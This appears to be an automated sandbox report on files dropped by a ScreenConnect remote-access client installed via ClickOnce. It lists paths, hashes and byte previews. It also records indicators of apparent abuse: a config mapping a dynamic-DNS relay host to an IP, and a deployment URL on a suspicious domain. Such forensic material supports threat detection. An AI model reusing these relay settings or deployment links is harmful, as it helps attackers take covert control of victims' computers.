SHA-512:	586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
Malicious:	false
Preview:	<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\bkm4yyl2.newcfg

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	559
Entropy (8bit):	5.037824791095549
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO0Y81vhc/vXbAa3xT:2dL9hK6E46YPt8XyvH
MD5:	A2D9932DC1CB62DEA4765FC11D6CEFE3
SHA1:	F6EA2F71A015C5CB671A200608F37A21CF97D317
SHA-256:	0BC24412FD40963F6A1C1982C11BC61F1AB6340895C287C9B26057BA08BD5832
SHA-512:	350FF1D7297ACAA3208682132FEF213F6CD81D04454A2A7874F1C526A7BA019DFCA920FC4576D6B0723E01366A6EE2975FB555E092F52C40D71E829A47A37A42
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>mmf351.ddns.net=79.110.49.16-02%2f10%2f2024%2004%3a23%3a10</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\user.config (copy)

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	559
Entropy (8bit):	5.037824791095549
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO0Y81vhc/vXbAa3xT:2dL9hK6E46YPt8XyvH
MD5:	A2D9932DC1CB62DEA4765FC11D6CEFE3
SHA1:	F6EA2F71A015C5CB671A200608F37A21CF97D317
SHA-256:	0BC24412FD40963F6A1C1982C11BC61F1AB6340895C287C9B26057BA08BD5832
SHA-512:	350FF1D7297ACAA3208682132FEF213F6CD81D04454A2A7874F1C526A7BA019DFCA920FC4576D6B0723E01366A6EE2975FB555E092F52C40D71E829A47A37A42
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>mmf351.ddns.net=79.110.49.16-02%2f10%2f2024%2004%3a23%3a10</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.068776675019683
Encrypted:	false
SSDEEP:	1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
MD5:	0402CF8AE8D04FCC3F695A7BB9548AA0
SHA1:	044227FA43B7654032524D6F530F5E9B608E5BE4
SHA-256:	C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
SHA-512:	BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1373
Entropy (8bit):	5.369201792577388
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
MD5:	1BF0A215F1599E3CEC10004DF6F37304
SHA1:	169E7E91AC3D25D07050284BB9A01CCC20159DE7
SHA-256:	D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
SHA-512:	68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1662
Entropy (8bit):	5.368796786510097
Encrypted:	false
SSDEEP:	48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
MD5:	F133699E2DFF871CA4DC666762B5A7FF
SHA1:	185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
SHA-256:	9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
SHA-512:	8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\B3D7NWNK.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (613), with CRLF line terminators
Category:	dropped
Size (bytes):	14920
Entropy (8bit):	3.806531013801056
Encrypted:	false
SSDEEP:	96:t6BKadfqHgcNfUpUBBaOy0lZ6dfqHgcNEh+/HhE/ibm8zCtkcTuJdfqHgcNJ36MD:yqHzoUapqHzTaWC/a7qHzzfGLEv
MD5:	439852D41932D98E7AFB4F44A7C68175
SHA1:	50916DA27A4253A9397F07B7B76E7ED1CB3CFFAA
SHA-256:	EF94E616E886C85BE299A91627823A8EB5ED872E0727FC395ACE3073CA2F9D7B
SHA-512:	CC45559893EA6FE74B1116506FA70D1AF05FA0EB2FE728AF807988E4F4BE478F4B669AAF18D1FE4F347E8ADBD6548932FDDD7BFF0B5DB4CE11EFB8D9146ECFFA
Malicious:	false
Preview:	..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.o.t.o.h.e.l.p...t.o.p./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.m.m.f.3.5.1...d.d.n.s...n.e.t.&.p.=.8.0.4.1.&.s.=.8.9.e.4.7.0.a.f.-.f.4.2.d.-.4.b.2.f.-.a.d.1.d.-.7.1.7.7.1.1.c.

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.58476728626163
Encrypted:	false
SSDEEP:	3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
MD5:	AE0E6EBA123683A59CAE340C894260E9
SHA1:	35A6F5EB87179EB7252131A881A8D5D4D9906013
SHA-256:	D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
SHA-512:	1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Client.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1041
Entropy (8bit):	5.147328807370198
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
MD5:	2EA1AC1E39B8029AA1D1CEBB1079C706
SHA1:	5788C00093D358F8B3D8A98B0BEF5D0703031E3F
SHA-256:	8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
SHA-512:	6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.068776675019683
Encrypted:	false
SSDEEP:	1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
MD5:	0402CF8AE8D04FCC3F695A7BB9548AA0
SHA1:	044227FA43B7654032524D6F530F5E9B608E5BE4
SHA-256:	C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
SHA-512:	BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.ClientService.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	5.084538887646832
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
MD5:	E11E5D85F8857144751D60CED3FAE6D7
SHA1:	7E0AE834C6B1DEA46B51C3101852AFEEA975D572
SHA-256:	ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
SHA-512:	5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505346220942731
Encrypted:	false
SSDEEP:	1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
MD5:	361BCC2CB78C75DD6F583AF81834E447
SHA1:	1E2255EC312C519220A4700A079F02799CCD21D6
SHA-256:	512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
SHA-512:	94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.031251664661689
Encrypted:	false
SSDEEP:	6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
MD5:	16C4F1E36895A0FA2B4DA3852085547A
SHA1:	AB068A2F4FFD0509213455C79D311F169CD7CAB8
SHA-256:	4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
SHA-512:	AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Core.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.1303806593325705
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
MD5:	2343364BAC7A96205EB525ADDC4BBFD1
SHA1:	9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
SHA-256:	E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
SHA-512:	AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639136400085158
Encrypted:	false
SSDEEP:	24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
MD5:	9F823778701969823C5A01EF3ECE57B7
SHA1:	DA733F482825EC2D91F9F1186A3F934A2EA21FA1
SHA-256:	ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
SHA-512:	FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Windows.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
